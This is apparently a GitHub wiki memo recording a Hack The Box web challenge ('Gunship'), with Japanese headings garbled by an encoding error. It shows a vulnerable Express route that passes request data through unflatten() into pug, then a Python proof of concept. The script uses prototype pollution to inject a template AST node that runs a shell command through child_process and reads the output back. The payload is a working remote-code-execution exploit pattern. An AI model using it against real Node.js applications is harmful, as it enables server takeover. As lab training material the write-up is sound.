HTB_web_Gunship - meruneru/tech_memo GitHub Wiki
解γγͺγγ£γγ
unflatten() injection γ¨γγεθͺγ§θͺΏγΉγγ¨γδΈθ¨γγΌγΈγθ¦γ€γγγ
https://blog.p6.is/AST-Injection/#Exploit
router.post('/api/submit', (req, res) => {
const { artist } = unflatten(req.body);
if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
return res.json({
'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
});
} else {
return res.json({
'response': 'Please provide us with the full name of an existing member.'
});
}
});
解η
import requests
URL = '[URL]'
# make pollution
r = requests.post(URL+'/api/submit', json = {
"artist.name":"Gingell",
"__proto__.type": "Program",
"__proto__.body": [{
"type": "MustacheStatement",
"path": 0,
"params": [{
"type": "NumberLiteral",
"value": "process.mainModule.require('child_process').execSync(`whoami > /app/static/out`)"
}],
"loc": {
"start": 0,
"end": 0
}
}]
})
print(requests.get(URL+'/static/out').text)